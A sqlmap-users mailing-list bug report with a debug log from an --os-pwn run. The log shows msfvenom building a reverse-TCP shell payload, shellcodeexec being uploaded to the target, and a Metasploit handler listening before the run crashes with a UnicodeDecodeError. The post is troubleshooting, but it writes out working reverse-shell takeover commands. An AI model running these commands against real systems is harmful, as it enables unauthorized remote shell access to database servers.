[sqlmap-users] SQLmap --os-pwn Meterpreter BUG

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Got another error when trying to use the metasploit reverse shell option
either default shell or Meterpreter, below the run:

which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[22:36:39] [DEBUG] executing local command:
/usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
-f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
[22:36:39] [INFO] creation in progress ..... done
[22:36:44] [DEBUG] the shellcode size is 102 bytes
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
[22:36:47] [INFO] shellcodeexec successfully uploaded
[22:36:47] [INFO] running Metasploit Framework command line interface
locally, please wait..
[22:36:47] [DEBUG] executing local command:
/usr/share/metasploit-framework/msfcli multi/handler
PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
LHOST=192.168.184.217 E
[*] Initializing modules...
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => process
LPORT => 3000
LHOST => 192.168.184.217
[*] Started reverse handler on 192.168.184.217:3000
[*] Starting the payload handler...
[22:36:51] [INFO] running Metasploit Framework shellcode remotely via
shellcodeexec, please wait..
[22:36:51] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 6 times
[22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[22:36:52] [CRITICAL] unhandled exception occurred in
sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
development version from official GitHub repository at '
https://github.com/sqlmapproject/sqlmap'. If the exception persists, please
open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
with the following text and any other information required to reproduce the
bug. The developers will try to reproduce the bug, fix it accordingly and
get back to you
sqlmap version: 1.0-dev-96327b6
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u
*********************************************************************
--os-pwn --msf-path /usr/share/metasploit-framework/ -v3
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap", line 102, in main
    start()
  File "lib/controller/controller.py", line 617, in start
    action()
  File "lib/controller/action.py", line 163, in action
    conf.dbmsHandler.osPwn()
  File "plugins/generic/takeover.py", line 261, in osPwn
    self.pwn(goUdf)
  File "lib/takeover/metasploit.py", line 651, in pwn
    debugMsg += "with return code %s" %
self._controlMsfCmd(self._msfCliProc, func)
  File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
    func()
  File "lib/takeover/metasploit.py", line 434, in
_runMsfShellcodeRemoteViaSexec
    cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
ordinal not in range(128)

-- 
DanUx